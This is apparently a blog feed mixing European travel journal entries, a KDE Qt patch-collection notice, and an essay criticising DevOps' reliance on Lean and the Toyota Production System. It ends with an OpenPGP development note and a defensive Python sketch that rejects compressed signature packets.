On the next morning (at the time of writing it was barely still today), I took some quick breakfast and then prepared to return to the beach. This time I brought both sunscreen and a towel in addition to some coins for metro tickets, plus the usual equipment (picnic blanket, water bottle). My phone and purse on the other hand I had left at the hostel today. Should some thief decide to rob me today, he wouldn’t be in luck. The most valuable item I had on me was the key to the hostel locker, which I planned to take with me into the water.

So after a quick metro ride and some few minutes of walking I was back at the beach. Today it was even hotter than the day before, so when I got rid of my shoes to walk through the sand bare feet, I almost regretted that decision. After setting up my base close to the shore, I decided to first get some more sun to let my towel (which was still a bit moist from a shower I had the day before) dry. Then it was time to get buoyant (hah!).

The water was not cold at all. It wasn’t exactly warm either, but instead had exactly the right temperature. It was perfect.

After my swim I re-sprayed with sunscreen and then got some more sun. Later I decided not to risk a sunburn (you know how hard it is to apply sunscreen to your own back without support or a mirror?) and to go back to the hostel. After a quick refresh in the shower I did get about an hour of work done and then noticed that I was hungry.

In the historic core of the city I found a nice looking restaurant and – to my disappointment – got the most expensive frozen pizza of my life. I mean, I did not ask afterwards, but I studied computer science, trust me, I know my frozen pizza. Cannot recommend that place 🙁

Later today I wanted to meet with some folks from the hostel for some beers, but I do feel a bit sick, so I opted out and instead decided to have a chill evening in bed.

Sunday, 15 May 2022

Europe Trip Journal – Entry 12: Positive Vibes and Negative Results

Yesterday was a slower day. I stayed in bed until 13:00 or so and recovered some well needed sleep. After that I went out to get some breakfast. At a place called Black Panther I got a really nice burger/sandwich made from a buttery smooth croissant topped with salad, tomatoes, mayonnaise, mozzarella and green pesto. As a drink I got a cold brew latte. This was super tasty!

Afterwards I decided that it was time for some practical mathematics, so I performed a random walk through the city ;P Madrid is surprisingly three dimensional. While there are large flat areas, just behind the next wall there could be slope downwards into a valley. I even stumbled across a large arched bridge.

A few minutes later I walked down a street that could just as well be located in New York. It’s crazy how diverse the city is. At a large roundabout was an entrance to a park. Here people were relaxing in the sun, playing tennis or volleyball and right in the middle of the park was a water basin on which there were many rowboats.

Right beneath the large statue in the back, there was a saxophonist playing modern pop music hits. What had surprised me on my tour so far was how many street musicians were faking their performance. Previously I had seen a man playing the violin, while the instrument coming out from his loudspeaker was definitely a cello. There had been guitarists whose finger movements didn’t match up the music they were playing and so on. But this saxophonist was real and it sounded really nice.

Only a few hours later I was back at the hostel. Supposedly there was a community area in the basement, so I took the stairs down. At a wall I discovered a poster informing about a pub crawl. Since I really had enjoyed the one in Barcelona and since I hadn’t yet gotten to know any people I figured it’d be a good idea to join. It was still some time until the evening, so I went to the local supermarket to get a snack.

I also stopped at the pharmacy to buy a Covid test. I had felt a bit sick lately, so I took the test just to make sure. It would suck big time to get sick during the trip. Contrary to Germany, where there are heavily advertised test centers everywhere, I hadn’t seen any such facilities in France or Spain at all yet. On the internet I had read that you could do tests in private laboratories, but for foreigners they would charge around 100€ for that. You could also get a prescribed test paid for by health insurance after consulting a doctor, but that seemed like too much of a hassle to me, so the better option was an auto test. Luckily it was negative, so I was relieved and there was nothing standing in the way of the pub crawl.

At 21:30 the organizers arrived and invited everyone to a game of beer pong. Later we went to the first bar, which was actually another hostel. There I met some nice people. There was J., a friendly guy from Denmark, G., a huge dude from Paris, as well as two Canadian siblings A. and M. It was really nice meeting those people and I had some great conversations.

They say that Madrid is the city with the longest nights, but we only made it to some time after 3:00. After the tour, we got some fast food and then we parted ways. Unfortunately we haven’t exchanged contact information, so it’s unlikely to meet the folks again. Well, there will be another pub crawl another time for sure 🙂

Saturday, 14 May 2022

The KDE Qt5 Patch Collection has been rebased on top of Qt 5.15.4

Commit: https://invent.kde.org/qt/qt/qt5/-/commit/5c85338da3c272587c0ec804c7565db57729fd48

 

Commercial release announcement: https://www.qt.io/blog/commercial-lts-qt-5.15.4-released 


OpenSource release announcement: https://lists.qt-project.org/pipermail/development/2022-May/042437.html

 

I want to personally extend my gratitude to the Commercial users of Qt for beta testing Qt 5.15.4 for the rest of us.

 

The Commercial Qt 5.15.4 release introduced some bugs that have later been fixed. Thanks to that, our Patchset Collection has been able to incorporate the reverts for those two bugs that affected Android and Windows and the Free Software users will never be affected by those!



Friday, 13 May 2022

Europe Trip Journal – Entry 11: Adiós Amigas

This “morning” I got up at 10:00 after only around 5 hours or so of sleep. Sadly I was not able to extend my stay in the hostel in Barcelona, since the place was booked out, so it was time for me to pack my stuff. After a rather embarrassing self-made breakfast consisting of a chocolate cookie and an energy drink, I moved my backpack into the community area of the hostel and prepared for check-out.

This time I had learned from my mistake and booked a hostel in Madrid for 3 nights over the internet. My train would go at 16:00 which was in a little under 5 hours, so I asked M. if she wanted to venture out into the city with me. She agreed and we went to the Metro station to head out to a place where there was supposed to be a flea market.

The place (I forgot the name unfortunately) turned out to be an artists’ compound with multiple smaller halls with an art exposition and a small bar. The flea market actually was a second hand shop. I could not resist to try out some ridiculous shirts and I ended up buying 4 of them. Two are colorful Hawaii shirts, while one is an elegant black piece and the last one shall remain a secret for now 😛 I can assure you though that it is a very fancy piece.

Fancy new shirt, isn’t it?

While we were sifting through the cloth hangers, we met up with M.’s friend I. again. She joined our little shopping endeavors for a while. Afterwards we sat down in the sun for a bit. I was telling a story of a bar in Madrid which was a cave where apparently you could order a drink made from alcohol and milk which would come from the ceiling, flowing down some drip stones. I’ll need to visit that place indeed. Eventually we decided to get some lunch in a nearby park and bought some Bocadillas.

And then it slowly got time for me to leave for my train. At the metro station, I said farewell to M. and entered the metro with I. She left a few stops later, and so then I was on my own again.

At the train station I bought a reservation to Madrid and after following a maze of barriers I boarded the train. During the ride I wrote the last blog post and then watched the landscape that was rushing by outside my window. We were passing impressively steep rock walls and high mountains. Then there were areas which looked like someone stacked hill upon hill, kind of like the way little children draw mountains and valleys. Every now and then there were small Spanish towns scattered across those valleys and I could spot some castles built on rocks and summits.

At some point the sleep deficit showed its effects and I was getting so tired that it became hard not to fall asleep. The seat did not allow me to change into a comfy sleeping position though, so I was stuck in the limbo between being awake and falling asleep.

And then we arrived in Madrid. The train station Atocha seemed more like an airport, having unnecessarily long halls which served no obvious purpose than to contain huge amounts of people and it even had those fast-travel flat escalator-type belts for passengers. When I left through the front entrance, there was a huge pool of taxis waiting on a multi-lane road, ready to pick up passengers. Personnel was distributing people to the cars to break down the crowd as quickly as possible.

I went by foot though and aimed straight for my hostel which was 20 minutes or so away. I passed a small plaza on which a bunch of children was playing with spray bottles and water-filled balloons. It was great fun.

At the hostel I checked in to quickly stow away my backpack in my room and then I went out again. Without a real plan of where to go first, I somehow ended up on a big plateau between giant palace-like buildings. Here I fell into the trap of a sophisticated guilt-based scam attempt by a beggar. I later analyzed his “security exploit”, which was quite interesting:

First he asked for the time, which I gave him. He then told me that he would become a father soon, so he wanted to thank me for telling the time by giving me a bracelet. He insisted on me putting it onto my arm. I later realized that this was likely done to make me feel like I would owe him something back, but since it was harder to take the bracelet off and give it back, I would instead need to default to something else he would request. Next he handed me a small elephant made of stone. He said something about this being a symbol of his people or so, it was hard to understand him. At this point it was already clear to me that this was an attempt to beg for money, still I fell for it. He was really clever.

Next he told me that since he had done something for me, I would need to do something for him. So he asked for a bit of change to get to his home country. It was now that I was in the morally disadvantageous position of having two items from him. The more or less permanently attached cheap bracelet and the more valuable elephant. Since I could not easily give back the bracelet, I figured the only way out was to give him some few coins. He insisted on more, but I refused. Then he demanded back the elephant and left me feeling guilty, although I totally fell for his trickery. At least now I could take some nice photos of the city.

I continued my way through the city for some more time, but soon decided to go back to the hostel in order to get some much needed sleep.

During the train ride to Madrid, I received some photos M. had taken earlier. One of which is my favorite photo of the tour so far, simply because it was the first picture taken of myself, but not by myself.

Europe Trip Journal – Entry 10: Pub Crawl

While I am typing this, I am already on the train to my next stop, so bear with me while I’m trying to recall all that happened yesterday.

I had mistakenly assumed that my hostel stay would include a breakfast, but instead I was presented with a community kitchen where guests would cook food for themselves. So hungry as I was my first stop was the local Supermercat to get something edible. Being a simple man however, I resorted to cheap instant noodles which back at the hostel I could prepare with water from a water cooker.

I felt a bit cheap compared to the other guests who were preparing full-on meals with avocado, rice and eggs, but this was inexpensive and quick which was important, since I was going to have a video call later the morning.

After the call I took my time watching some Youtube video to finish my meal. Afterwards I asked another guest where to find the dish washer. To my surprise she answered me in German. Turns out she had seen the title of the video I watched earlier. She introduced herself as M. and explained she was from Germany as well. The world is small. M. offered me some of her coffee and explained that later she wanted to go on a club crawl, but she would not have found a non-sketchy offer yet. Then it was time for me to head out to the city. I wished M. a good day and left the hostel.

My plan for today was to further explore the historic part of the city, as well as the Mercat la Boqueria. The best way I can think of to describe the latter is that it looks like the hall of a train station, which hosts a permanent funfair, which however only consists of food stands selling weird food. There are stands selling mushrooms, raw fish, crustaceans, ox feet, sweet bakery pieces, all sorts of fried street food, chips, etc. It smells horrible in some places (in my opinion), but it’s also quite a spectacle.

Afterwards I strolled down the La Rambas, Barcelona’s busiest street. I wanted to go the beach next. The hostel personnel actually had advised me not to go there since it was ugly, but I did not care. Sure, it wasn’t the nicest beach I had ever been to, but I just wanted to relax a bit, sitting in the warm sand. There were lots of merchants patrolling around, announcing they had beer, water, blankets and scarfs for sale. It was a bit annoying, but I guess it is part of the experience.

After an hour or so, I decided I had enough and went back to the hostel. There was some work waiting to be done, and I hadn’t previously tried the co-working space which had a nice sofa. I also tried to extend my stay at the hostel, but unfortunately they were already booked out for the next days 🙁

Later M. arrived back at the hostel. She explained that she had met some other people who knew some good pub crawl. Unfortunately the provider required reservation and only accepted credit cards. Meh. Eventually we agreed upon a time to leave for the crawl together to meet up with M.’s friend I.

We wanted to meet up at the Magic Fountain, where at this evening was a show with music and lights illuminating the fountain. I’m normally not into such things, but the atmosphere was great. In addition to the lights of the show, people were shooting blinking toys into the air using slingshots. Those then slowly floated down to the floor again. They were selling these toys to tourists all across the place.

After watching the fountain, we wanted to go to the metro to get to the first pub, however on the way our attention was drawn to a big monumental building on which an animation was projected, along with music. Until today we still aren’t really sure what the animation was about. It was something about words of inspiration that were collected from social networks, and about the pandemic. Since there was a timer which was counting down from 7:00 or so, we decided to wait what would come once the timer reached zero, but what followed was an inconclusive clip with a robot voice narrating the animation. And at some point it looped back to the countdown.

We took the train and then arrived at the pub. The organizer told me that I would have to pay in cash to participate in the event, otherwise I would not be allowed to even follow M. and I. Apparently some places had an entry fee which was covered by the ticket price, so I got some money from a nearby ATM and joined the event.

I will spare you of the details, but in summary we went to 4 pubs and bars and later to a club. I would estimate, that my risk of contracting Covid was tenfold higher this evening than it had been the last year. For me the day ended with only 5 hours of sleep, before I would need to check out of the hostel at 11:00 the next day. I now own a wrist-band which quite fittingly reads “I survived Barcelona”.

It was a very good evening.

Thursday, 12 May 2022

DevOps inspiration from Toyota Production System and Lean considered harmful

Note: This text was originally the synopsis for a much longer article which I intended to write as the followup to a lightning talk about the subject I did at my workplace. Acknowledging that I probably won’t get time to write the long version, I think this synopsis can stand pretty well on its own as a statement of intent.

DevOps and DevOps-related practices have become a huge thing in the software industry. Elements of this, such as Continuous Integration and Continuous Deployment and the focus on monitoring production systems and metrics, have resulted in large improvements in the handling of large-scale deployments. Especially, the act of deployment to production, in traditional systems often an error-prone process riddled with cataclysmic pitfalls and requiring huge amounts of overtime, is reduced to the trivial pushing of a button which can easily be done in normal office hours.

While the success of DevOps largely rests on technological improvements (containerization, orchestration systems, ease of scaling with cloud technologies) as well as process improvements originating in the Agile methodologies as they have developed since 2001 (with concepts such as pair programming, Test Driven Development and a general focus on automatization), much of the literature on DevOps contains a strong “ideological”, to the point of evangelization, promotion of the underlying philosophies of Lean production and management systems. One very conspicuous feature of this ideology is the canonization of Japanese management methods in general and the Toyota Production System (TPS) in particular as an epitome of thoughtful and benign innovation, empowering workers by incorporating their suggestions, achieving world-class production quality while simultaneously showing the maximum respect for each and every one of the humans involved.

This method (the TPS) was, the story goes, introduced in Western manufacturing and later in management, where its basic principles – improvement circles (kaizen), value stream mapping, Kanban, etc. – have streamlined the basic business processes, improved productivity and reduced costs. Now, the narrative continues, DevOps will apply these same Lean lessons in the software industry, and we can expect similar vast improvements of productivity.

It is problematic, however, to try to “learn from Toyota” and from Lean Manufacturing without examining in detail how these work in practice, not least how they affect the people actually working in those systems. The authors behind some of the more popular DevOps introductions – The DevOps Handbook and the novels “The Phoenix Project” and “The Unicorn Project” – do not seem to have actually studied the implications of working under the TPS for Toyota’s Japanese employees in great detail, if at all, and seem to have all of their knowledge of the system from American management literature such as James Womack et al’s “The Machine that Changed the World”, basing their own Lean philosophies entirely on Toyota’s own public relations-oriented descriptions of their system.

This is problematic, since it overlooks the distinction between Toyota’s corporate representation of the intention of their production system – and the actual reality felt by automobile workers on the shop floors. Darius Mehri, who worked at Toyota as a computer simulation engineer for three years, has pointed out that the Western management movements inspired by Toyota have failed to understand a very fundamental distinction in Japanese culture and communication: The distinction between tatemae (that which you are supposed to feel or do) and honne (that which you really feel and do). Mehri posits that all Western proponents of The Toyota Way fail to realize that what they are describing is really the tatemae, what management will tell you and what workers will tell you in a formal context when their words might come back and harm them – while the honne is much grittier, much darker and much more cynical.

In effect, proponents of Lean manufacturing and management styles have imported a kind of double-speak in a Japanese variant, but similar to the all too well-known difference between corporate communications and what workers will confide in private. By doing so, they have inherited the fundamental lie that the priorities of the TPS are respect for each individual employee, partnership between management and workers, and involvement of each and every employee in the continuous improvement of the workplace; while its true priorities are a maximization of profit through the imposition of frenetic work speeds and very long working hours, discarding workers afflicted by the inevitable accidents and work-related diseases – and an “innovation” mainly driven by imitation of other manufacturers.

The truth about the very Toyota Production System that inspired the Lean movement is, leaving the tatemae aside and looking at the honne, that these factories are driven unusually ruthlessly, with little or no regard for the human costs for the workers on the shop floor. Meetings, security briefings and announcements are routinely made after or before actual working hours, when workers are on their own time. Assembly lines are run at extreme speed in order to increase productivity, resulting in serious accidents, chronic work-related diseases as well as production defects. Even so, production targets are set unrealistically high, and the shop crews are not allowed to go home before they are met, often resulting in several hours of daily overtime. The “improvement circles” do exist and workers are indeed asked to contribute, but the end goal is always to increase production and increase line speed, never to create more humane working conditions on the shop floor. Such improvements are (if at all) introduced more grudgingly, e.g. as a consequence of labor shortages and worker dropout.

Lean, by lauding the TPS and uncritically buying its tatemae, is introducing a similar honne of its own: It is, in reality, not revolutionizing productivity, and for all its fair words does not promote the respect of each worker as an individual. On the contrary, the relentless focus on constant “improvements” and constant demand that each employee rationalizes their work as much as possible has caused it to become known as “management by stress”. It may indeed focus on metrics and may indeed choose metrics to demonstrate its own success – while achieving results that range from average/no change to absolutely dismal.

Proponents of DevOps should stop presenting Toyota as any kind of ideal way of working – literally, a nightmarish grind with workers forced to do ten- or eleven hour shifts, ignoring accidents, running beside old and worn-out machinery in outrageously dangerous conditions is not where we want to go. And the “ideal Toyota” with its “improvement kata” and “mutual respect” never existed except as the tatemae to the cynical honne of shop-floor reality. By importing the tatemae as though it were Truth itself, the Lean movement has imported its double-speak – Lean or “management by stress” transitions can be very unpleasant indeed for employees, and while everything is shrouded in talk of partnership and mutual respect, the underlying motivation will often be money-saving through layoffs – the honne to the Lean management bullshit’s tatemae.

That is to say: Perpetuating the lie about Toyota as a humane, innovative and respectful workplace is positively harmful to the employees and processes afflicted by the proposed improvements, as the double-speak involved will inevitably rub off. The Toyota tatemae was not, after all, designed to be practised literally. Accepting it at face value will only set us up for further double-speak in our own practice.

While the software industry can and should continue to evolve based on the philosophy enshrined in the Agile Manifesto and the improved work processes introduced by DevOps, we should eschew the mendacious narrative of Happy Toyota and reject the Lean philosophies that it founded.

REFERENCES

Heather Barney and Sheila Nataraj Kirby: Toyota Production System/Lean Manufacturing in “Organizational Improvement and Accountability: Lessons for Education from Other Sectors”, RAND Corporation 2004 (online: https://www.jstor.org/stable/10.7249/mg136wfhf.9).

Ian Hampson: Lean Production and the Toyota Production System – Or, the Case of the Forgotten Production Concepts, Economic and Industrial Democracy © 1999 (SAGE, London, Thousand Oaks and New Delhi), Vol. 20: 369-391 (online: https://library.fes.de/libalt/journals/swetsfulltext/6224179.pdf).

Jeffry S. Babb, Jacob Nørbjerg, David J. Yates, Leslie J. Waguespack: The Empire Strikes Back: The End of Agile as we Know it?, paper given at The 40th Information Systems Research Seminar in Scandinavia: IRIS 2017 – Halden, Norway, August 6-9, 2017 (online: https://research-api.cbs.dk/ws/portalfiles/portal/58521158/IRIS_2017_critical_170501_submission.pdf)

Darius Mehri: The Darker Side of Lean: An Insider’s Perspective on the Realities of the Toyota Production System, Academy of Management Perspectives 20, 2, 2006 (online: https://www.jstor.org/stable/4166230)

Stuart D. Green: The Dark Side of Lean Construction: Exploitation and Ideology, proceedings IGLC-7, 1999, 21-32 (online: https://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.22.323&rep=rep1&type=pdf)

Satoshi Kamata: Japan in the Passing Lane: An Insider’s Account of Life in a Japanese Auto Factory, Pantheon Books, New York (1982)

Gregory A. Howell and Glenn Ballard: Bringing Light to the Dark Side of Lean Construction: A Response to Stuart Green, proceedings IGLC-7, 1999, 33-38 (online: https://citeseerx.ist.psu.edu/viewdoc/download;jsessionid=203907F7926472DB31BBE75D290A826B?doi=10.1.1.418.4301&rep=rep1&type=pdf)

Will Johnson: Lean Production – inside the real war on public education, Jacobin Magazine, December 2012 (online: https://www.jacobinmag.com/2012/09/lean-production-whats-really-hurting-public-education/)

Mike Parker: Management-By-Stress, Catalyst Magazine 1, 2, 2017 (online: https://catalyst-journal.com/2017/11/management-by-stress-parker)

Gene Kim, Jez Humble, Patrick Debois and John Willis: The DevOps Handbook, IT Revolution Press, Portland (OR) 2016.

Gene Kim, Kevin Behr and George Spafford: The Phoenix Project, IT Revolution Press, Portland (OR) 2015.

Gene Kim: The Unicorn Project, IT Revolution Press, Portland (OR) 2019.

Phil Ledbetter: Why Do So Many Lean Efforts Fail?, https://www.industryweek.com/operations/continuous-improvement/article/21144299/why-do-so-many-lean-efforts-fail, 20/9-2020.

Enid Mumford: “Sociotechnical Design: An Unfulfilled Promise or a Future Opportunity”, https://link.springer.com/content/pdf/10.1007/978-0-387-35505-4_3.pdf

Wednesday, 11 May 2022

Europe Trip Journal – Entry 9: Cable Cars

Today started with a small hangover. Headache and a sore throat. After some sips of water however, it quickly vanished and it was time for breakfast.

After finding out that the breakfast was served outside the hostel and not inside like Ben and I thought at first, we got to enjoy a croissant, some coffee and a bun with jelly plus a yogurt. That’s cost-effective and tasty 🙂 After breakfast I took a quick shower and then it was time to say farewell. I headed to the train station, while Ben prepared to continue by bike.

At the station, I asked for a reservation for the train to Barcelona and they actually had some available. The train was punctual and the next chapter of my journey began without any problems.

Once seated, I started to get some more work done on my laptop. My goal was to get the prototypical certification implementation going, so I could start cleaning up the code. There were fewer changes required than expected, so I could quickly get started refactoring away. Meanwhile the train rushed over mountains and hasted through tunnels.

When we arrived in Barcelona I first thought it was raining heavily, since the outside of my windows had been dark and grey for the last two stops. Only then I noticed that actually we had been underground for some time. I left the train and walked to the exit, where I was greeted by the sun.

My first impression of Barcelona was that of a Jungle made from City. Houses were standing tightly packed and reached high up in the sky. When it felt like Paris was arrogantly ignoring me, now I felt like Barcelona was the entirety of the Jungle’s wildlife, not taking notice of me for now, but ready to attack at any moment. It wasn’t that I was afraid or anything, but there was some feeling of tense excitement.

When I reached the hostel I had picked out during my train ride, they unfortunately told me they were already booked out. But they referred me to another hostel of the same brand, some 20 minutes away. This one fortunately had one(!) bed available. I booked for 2 nights, as the city is so big that it will surely take more than a single day to explore even a fraction of it. I stowed away my backpack and then headed out.

Having spent a week in France, I had to re-adapt my muscle memory when it comes to the language. Suddenly I had to go from French which I learned some years ago in school, to Spanish which I had taken a class for in university not long ago. More than once I accidentally greeted people with “Bonjour”.

Most of Barcelona’s city is aligned along a grid. You can follow a street for kilometers, while the same pattern repeats: Big houses left and right with wide space between for walking or streets, then a crossing and every now and then a street in a 45 (or 35?) degree angle.

The first point of interest I visited was the Sagrada Família. Unfortunately I could not visit from the inside and also not go to the roof, as the booking process was using an app (which did not work for me), or alternatively using a credit card (which I don’t have, I only have debit) 🙁 I will try tomorrow to get hold of some tickets in some other way. Maybe one can buy them in some tourist office?

After this semi-disappointment I went to the historic part of the City, the Barri Gotic. While, as I described, most of the city is aligned to the grid, the historic part is not. There is a hard cut and then the houses suddenly stand much closer, the narrow streets are bent around corners and the facades of the buildings seem to lean in towards another. The stark contrast makes it even more beautiful.

There are small, dark alleyways branching off the “main roads”. Here the houses stand so close that you wonder why they even bothered to add windows.

Through this maze, I eventually reached the cathedral of Barcelona, a big church where you can visit the roof to get a nice view of the “skyline” of the city.

From the roof I could spot my next target. At the port area there was a tower from which a cable car was spanning across hundreds of meters to the bottom of a mountain. Originally I thought it was going all the way to the summit, but later found out that there were two distinct cable cars.

I walked all the way to the port and got into the queue for the cable car. When it departed, I got an excellent overview of the city. Unfortunately the photos I took by no means do justice to the experience.

The mountain I was about to “climb”

Off the cable car, I had a few hundred meters left, climbing a steep road all the way to the summit of the mountain. On the way I passed some nice, luxury hotels (the kind you know from James Bond movies), and beautiful parks. There even was a waterfall!

At the summit was a castle, which unfortunately you’d have to pay to visit, so I passed and instead walked the pathway around the castle to get a nice view into the valley and onto the ocean. While the view was breathtaking in person, my photos turned out generic, so I will spare you the photos.

My feet were hurting as hell, so I decided it was time to go back to the hostel. On the way back I came across a big market building which I will check out tomorrow. I also got recommended to visit some market space, but I am not sure if this one was it. We will see.

What I noticed in France, but especially here in Barcelona is that pedestrians take red traffic lights only as a recommendation. People mostly don’t wait for the light to turn green, but instead start pouring onto the street as soon as it is apparent that the last car passed. This goes against my inner German, but I’m slowly adapting. What doesn’t kill you may honk.

Now it’s time to give my tortured feet some relief and to let the day slowly fade away. Buena noche.

Europe Trip Journal – Entry 8: Perpignan

This post is a bit delayed, since yesterday I did not find the time to write it down.

After spending the night in the hostel in Narbonne, I checked my phone for connections to Barcelona. One suggestion was to go from Narbonne to Port-Bou which is just a few kilometers from the border, already in Spain and to continue from there. During my ride on the train, I checked again and it suggested me to switch trains in Perpignan. Since I had read that name before in the app, I spontaneously decided to leave the train there.

At the train station I went to the ticket office, since I needed a reservation and all online tickets were apparently already sold out. After some waiting in the queue, the person at the help desk told me that I should continue to Port-Bou and go from there, as the TGV which would go from Perpignan to Barcelona directly was cancelled. I rechecked my phone and it did not show me any connections from Port-Bou to Barcelona. The only connections it showed would go back to Perpignan and then from there to Barcelona. Strange.

I entered the queue once again and wanted to ask for confirmation or at least information about the train from Port-Bou. However, this time another employee told me that there was no chance to get from Perpignan to Barcelona today, as all connections were busy. So Perpignan it was for today.

I headed out the train station and located a youth hostel not too far away. I was just about to adjust my backpack when a man who was sitting at a café asked me whether I was staying over night. A bit disoriented I said I was trying to find a place in the youth hostel. Then he told me he was the manager of that hostel and that he could stow away my luggage, as the hostel was currently closed. I was skeptical. What would be the odds of this being a scam?

I replied that it was okay and that I would just hang out somewhere with my luggage until the hostel would open. He nodded and I continued my way.

Perpignan

I found another park where I could lay down in the grass and listen to some podcast. There weren’t many people here, so it was quite a quiet, peaceful place. After 2 hours or so, it was time to continue to the hostel. Et voila! In front of the entrance sat the man from before. It really was the manager 🙂

I booked my room and then headed out for a walk. On OpenStreetMaps I had seen a larger area of green which I wanted to check out. However, it turned out there was no quick way there which wouldn’t involve walking over a highway bridge, so at some point I decided to give up and return.

Back at the hostel I grabbed my laptop and went outside to get some work done. The OpenPGP specification was unclear in a few spots and so I opened some tickets to track those issues. Then it was time to relax a bit in a hammock.

The hostel had a hammock!

Later, another guest arrived by bike at the hostel. It turned out his name was B. and he was from Germany as well. He explained that he wanted to travel all the way to South-America with his bike! Impressive. He also wanted to go to Barcelona next.

Later in the evening we went out to get some beers together. After 4 rounds and some chips I felt rich and when the bar closed we went back to the hostel. It was a good evening and I am very thankful to B. for inviting me to head out with him 🙂

Monday, 09 May 2022

Europe Trip Journal – Entry 7: Mosquitos

My next stop was Narbonne. Originally I wanted to go from Bordeaux directly to Spain, but there were no train connections. So instead the Interrail app recommended me to cross France to the East to go to Narbonne and then from there South to enter Spain. So that was the plan for today. Unfortunately the train only went a very few times a day, so I had to board it at 14:30, which basically is in the middle of the day, meaning most of the day will be lost. All in all the ride was supposed to take a bit over 3 hours, meaning I would be in Narbonne roughly at 18:00.

In some recent post I was marveling at the punctuality and reliability of French trains. Now I have to revise my statements. I had to buy a reservation for the train and my seat was in cart number 10. Before departure, a stressed out conductor made some announcements in French and after that people around me packed their bags and started to leave the train. I asked another passenger what happened and they told me that there was a technical problem with the cart, so all passengers should leave and wait for the repair technician.

Some minutes passed while I was waiting in the sun together with about 50 other passengers, then the conductor made another announcement. The air conditioning in the cart was broken and we were supposed to split up over the other train carts, told me another passenger. Luckily I found a free seat, which I could occupy for the duration of the ride. Other passengers were not so lucky and either did not find a free seat at all, or had to give it up to other passengers at some point. All this chaos led to the train departing with a delay of about 40 minutes. When we finally arrived in Narbonne, the delay would have increased to a whole hour.

I did not pay much attention to the landscape outside the window, as I was doing some work on my laptop. Also, I had not gotten a window-seat, so it wasn’t that easy looking out. At some point though I noticed that the landscape outside was drastically changing. The gentle vineyards of Bordeaux were replaced by full-grown mountains and the color of the soil slowly changed to a more red-ish/orange-ish brown. The vegetation was also different, although I lack the vocabulary and knowledge of the flora to accurately describe it. Basically, suddenly there were those pointy trees which I always associated with the Italian Toskana.

Since now it was already very late afternoon (past 19:00), I figured my chances to find an affordable hostel were quite low, since surely most places were already booked out. And I felt adventurous, so I decided to attempt to go to the beach and find some nice spot where I could spend the night in open air. I had checked the weather report, which stated that temperatures would only drop to around 12°C which I should be able to survive using my blanket and Jacket and extra trousers.

Beautiful, isn’t it?

And so I started walking from the train station down to the coast. OpenStreetMaps reported that it would take around an hour to complete the stretch, but I believe it took me at least 1:30. On my way though I crossed beautiful vineyards and enjoyed the ambience. Arriving at the shore I noticed an issue. Mosquitos. At first I thought it wasn’t too bad. I knew that mosquitos often live near waters, but my hope was that they would somehow fear salty water. Turns out that’s not the case. When I tried to settle down at some acceptable spot, I quickly decided to bail as suddenly there were at least 20 mosquitos swarming around my head.

This could have been my resting view, but the stupid mosquitos ruined it

I tried walking them off, but they followed me. So in the end I had to give up and needed to walk all the way back to the city. Luckily I found a hostel, but unfortunately my stay in Narbonne would be comparably expensive to that in Nantes. At least I have a big bed in my own room again, so I expect to sleep well at last.

Sunday, 08 May 2022

Europe Trip Journal – Entry 6: Laundry Day

Today I took the train to Bordeaux. I had to leave the hostel at 10, so since the train station was only about half an hour away, I had about an hour extra to kill since my train would go at 11:30. So I took some detours on the way, however I still arrived early at the station and had to wait some time.

The train was quite slow compared to high speed trains like the TGV or Thalys I took before. From start to finish the ride took a bit over 2 and a half hours, during which I could notice how the landscape around me was changing. From sparsely standing, low trees and tall grass, the land soon transformed into heavily tree-covered leafy forests, which then turned into mostly coniferous forests which finally gave place to large vineyards. We crossed several metal bridges and passed some nice rural villages. One train station did not even have a platform.

I did a little bit of work during the ride. When processing signatures, PGPainless would accept single signatures, lists of signatures, as well as compressed signatures. The latter actually makes no sense. A cryptographic signature is indistinguishable from randomness, so there is no sense in compressing it, as there would be no decrease in size. The only use for compressed signatures would be for an attacker trying to exploit flaws in the compression algorithm, so I removed support for compressed signatures from PGPainless. Thanks to DemiMarie for pointing this out in a group chat.
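The check described in the paragraph above, as an added Python sketch (not PGPainless code, which is written in Java): it walks the RFC 4880 packet headers of binary, unarmored input and accepts only Signature packets (tag 2), refusing a Compressed Data packet (tag 8) before any decompressor is invoked. The function names and the sample byte strings are constructed for illustration; the sample bodies are placeholders, not valid signatures.

```python
"""Accept only bare OpenPGP Signature packets; refuse compressed input."""

TAG_SIGNATURE = 2          # packet tags as defined in RFC 4880, section 4.3
TAG_COMPRESSED_DATA = 8


class RejectedPacket(ValueError):
    """The input is not a plain sequence of Signature packets."""


def read_header(data, pos):
    """Return (tag, body_start, body_len); body_len is None when the
    header uses a partial or indeterminate length."""
    first = data[pos]
    if not first & 0x80:
        raise RejectedPacket("bit 7 of the packet tag octet is not set")
    try:
        if first & 0x40:                              # new-format header
            tag = first & 0x3F
            o1 = data[pos + 1]
            if o1 < 192:                              # one-octet length
                return tag, pos + 2, o1
            if o1 < 224:                              # two-octet length
                return tag, pos + 3, ((o1 - 192) << 8) + data[pos + 2] + 192
            if o1 == 255:                             # five-octet length
                return tag, pos + 6, int.from_bytes(data[pos + 2:pos + 6], "big")
            return tag, pos + 2, None                 # partial body length
        tag = (first >> 2) & 0x0F                     # old-format header
        length_type = first & 0x03
        if length_type == 3:                          # indeterminate length
            return tag, pos + 1, None
        width = 1 << length_type                      # 1, 2 or 4 length octets
        body_len = int.from_bytes(data[pos + 1:pos + 1 + width], "big")
        return tag, pos + 1 + width, body_len
    except IndexError:
        raise RejectedPacket("truncated packet header") from None


def extract_signatures(data):
    """Split binary input into Signature packets, rejecting everything else."""
    packets, pos = [], 0
    while pos < len(data):
        tag, start, length = read_header(data, pos)
        if tag == TAG_COMPRESSED_DATA:
            # Refuse before attacker-controlled bytes reach a decompressor.
            raise RejectedPacket("compressed data where a signature was expected")
        if tag != TAG_SIGNATURE:
            raise RejectedPacket(f"unexpected packet tag {tag}")
        if length is None:
            raise RejectedPacket("signature packet without a definite length")
        if start + length > len(data):
            raise RejectedPacket("packet body runs past the end of the input")
        packets.append(data[pos:start + length])
        pos = start + length
    if not packets:
        raise RejectedPacket("no signature packet found")
    return packets


def verdict(data):
    """Human-readable outcome for one input, used by the demo below."""
    try:
        return f"accepted {len(extract_signatures(data))} signature packet(s)"
    except RejectedPacket as exc:
        return f"rejected: {exc}"


# Constructed sample inputs (placeholder bodies, not real signatures).
SAMPLE_NEW_SIG = bytes([0xC2, 0x04]) + b"\x04\x00\x01\x08"    # new format, tag 2
SAMPLE_OLD_SIG = bytes([0x88, 0x03]) + b"\x04\x00\x01"        # old format, tag 2
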